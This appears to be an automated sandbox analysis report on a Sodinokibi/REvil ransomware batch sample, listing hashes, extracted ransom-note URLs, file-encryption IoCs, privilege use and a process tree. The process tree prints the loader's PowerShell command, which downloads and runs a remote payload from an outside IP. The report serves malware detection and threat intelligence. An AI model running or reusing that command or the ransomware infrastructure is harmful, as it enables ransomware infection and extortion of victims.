Analysis
- max time kernel: 76s
- max time network: 45s
- platform: windows10_x64
- resource: win10v200722
- submitted: 02-09-2020 21:10

Tasks
- Static task: static1
- Behavioral task: behavioral1
  Sample: cfc86f216b68d4b768a61dc8091a67ab.bat
  Resource: win7
- Behavioral task: behavioral2
  Sample: cfc86f216b68d4b768a61dc8091a67ab.bat
  Resource: win10v200722
General
- Target: cfc86f216b68d4b768a61dc8091a67ab.bat
- Size: 217B
- MD5: 89876aac9d3c6644f7ae3b4cf68d7a1e
- SHA1: e37353d60d13106478fd94133ec1ae8b15e51062
- SHA256: 146be0d88aa964787807ec908e13f1eb124530caca22ad1c3d80c73761892e90
- SHA512: 8ea7a17a997a6b12f0acac1951fe0dc70c57221bd2204173597b951e7bf77b3f1f94a5ded81f074f51cb159d4ebe7bf7db1c207fd4febcfae1183788890ee503
Malware Config
- Extracted: http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab
- Extracted: C:\g2u6d92-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/73FCEC3F69393DC5
  http://decryptor.cc/73FCEC3F69393DC5
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Blacklisted process makes network request (1 IoC)
Processes: powershell.exe
  flow | pid | process
  8 | 1428 | powershell.exe
Modifies extensions of user files (10 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes: powershell.exe
  description | ioc | process
  File opened for modification | \??\c:\users\admin\pictures\RedoHide.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\CheckpointSuspend.png => \??\c:\users\admin\pictures\CheckpointSuspend.png.g2u6d92 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ExportSwitch.png => \??\c:\users\admin\pictures\ExportSwitch.png.g2u6d92 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\GrantProtect.png => \??\c:\users\admin\pictures\GrantProtect.png.g2u6d92 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\RedoHide.tiff => \??\c:\users\admin\pictures\RedoHide.tiff.g2u6d92 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\ResolveFind.tiff => \??\c:\users\admin\pictures\ResolveFind.tiff.g2u6d92 | powershell.exe
  File opened for modification | \??\c:\users\admin\pictures\LockBackup.tiff | powershell.exe
  File opened for modification | \??\c:\users\admin\pictures\ResolveFind.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\HideSuspend.tif => \??\c:\users\admin\pictures\HideSuspend.tif.g2u6d92 | powershell.exe
  File renamed | C:\Users\Admin\Pictures\LockBackup.tiff => \??\c:\users\admin\pictures\LockBackup.tiff.g2u6d92 | powershell.exe
Enumerates connected drives (3 TTPs)

Modifies service (2 TTPs, 5 IoCs)
Processes: vssvc.exe
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2x85e4121n.bmp" | powershell.exe
Drops file in Program Files directory (37 IoCs)
Processes: powershell.exe
  description | ioc | process
  File created | \??\c:\program files (x86)\g2u6d92-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\CheckpointDismount.vst | powershell.exe
  File opened for modification | \??\c:\program files\GrantClear.vsdm | powershell.exe
  File opened for modification | \??\c:\program files\ImportCopy.asx | powershell.exe
  File opened for modification | \??\c:\program files\InitializeResume.emz | powershell.exe
  File opened for modification | \??\c:\program files\OutSet.rtf | powershell.exe
  File opened for modification | \??\c:\program files\ResumeOptimize.docm | powershell.exe
  File opened for modification | \??\c:\program files\SelectRedo.ADT | powershell.exe
  File opened for modification | \??\c:\program files\BlockConvertTo.crw | powershell.exe
  File opened for modification | \??\c:\program files\LimitShow.aifc | powershell.exe
  File opened for modification | \??\c:\program files\MeasureSkip.eps | powershell.exe
  File opened for modification | \??\c:\program files\ShowPing.3g2 | powershell.exe
  File opened for modification | \??\c:\program files\UnpublishHide.doc | powershell.exe
  File opened for modification | \??\c:\program files\SplitMount.ini | powershell.exe
  File opened for modification | \??\c:\program files\ApproveMove.M2TS | powershell.exe
  File opened for modification | \??\c:\program files\EnableConnect.m4v | powershell.exe
  File opened for modification | \??\c:\program files\FormatOut.jtx | powershell.exe
  File opened for modification | \??\c:\program files\InitializeReceive.wmf | powershell.exe
  File opened for modification | \??\c:\program files\LimitUse.i64 | powershell.exe
  File opened for modification | \??\c:\program files\ReadDisable.inf | powershell.exe
  File opened for modification | \??\c:\program files\RegisterDebug.asp | powershell.exe
  File opened for modification | \??\c:\program files\SuspendMerge.3gp | powershell.exe
  File created | \??\c:\program files\g2u6d92-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\MeasureRestore.ppsm | powershell.exe
  File opened for modification | \??\c:\program files\PingUnregister.clr | powershell.exe
  File opened for modification | \??\c:\program files\SaveInvoke.i64 | powershell.exe
  File opened for modification | \??\c:\program files\UnpublishStop.wmv | powershell.exe
  File opened for modification | \??\c:\program files\AssertSuspend.avi | powershell.exe
  File opened for modification | \??\c:\program files\CompleteMount.txt | powershell.exe
  File opened for modification | \??\c:\program files\DisableTest.mpeg | powershell.exe
  File opened for modification | \??\c:\program files\DisconnectUnblock.raw | powershell.exe
  File opened for modification | \??\c:\program files\OutRevoke.pub | powershell.exe
  File opened for modification | \??\c:\program files\DebugConvertFrom.pcx | powershell.exe
  File opened for modification | \??\c:\program files\DebugUninstall.ogg | powershell.exe
  File opened for modification | \??\c:\program files\GroupConfirm.mpeg3 | powershell.exe
  File opened for modification | \??\c:\program files\InstallEdit.txt | powershell.exe
  File opened for modification | \??\c:\program files\SuspendConvertFrom.vdw | powershell.exe
Drops file in Windows directory (1 IoC)
Processes: svchost.exe
  description | ioc | process
  File opened for modification | C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat | svchost.exe
Modifies data under HKEY_USERS (5 IoCs)
Processes: svchost.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" | svchost.exe
  Set value (data) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 5d27d3b07e81d601 | svchost.exe
  Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" | svchost.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe
  pid | process
  1428 | powershell.exe
  1428 | powershell.exe
  1428 | powershell.exe
  1428 | powershell.exe
  1428 | powershell.exe
Suspicious use of AdjustPrivilegeToken (8 IoCs)
Processes: svchost.exe, powershell.exe, vssvc.exe
  description | pid | process
  Token: SeShutdownPrivilege | 2644 | svchost.exe
  Token: SeCreatePagefilePrivilege | 2644 | svchost.exe
  Token: SeDebugPrivilege | 1428 | powershell.exe
  Token: SeDebugPrivilege | 1428 | powershell.exe
  Token: SeTakeOwnershipPrivilege | 1428 | powershell.exe
  Token: SeBackupPrivilege | 2568 | vssvc.exe
  Token: SeRestorePrivilege | 2568 | vssvc.exe
  Token: SeAuditPrivilege | 2568 | vssvc.exe
Suspicious use of WriteProcessMemory (3 IoCs)
Processes: cmd.exe
  description | pid | process | target process
  PID 2884 wrote to memory of 1428 | 2884 | cmd.exe | powershell.exe
  PID 2884 wrote to memory of 1428 | 2884 | cmd.exe | powershell.exe
  PID 2884 wrote to memory of 1428 | 2884 | cmd.exe | powershell.exe
Processes

C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cfc86f216b68d4b768a61dc8091a67ab.bat"
  PID: 2884
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab');Invoke-ABXNAAYIVS;Start-Sleep -s 10000"
      PID: 1428
      - Blacklisted process makes network request
      - Modifies extensions of user files
      - Sets desktop wallpaper using registry
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
  PID: 2644
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\vssvc.exe
  C:\Windows\system32\vssvc.exe
  PID: 2568
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken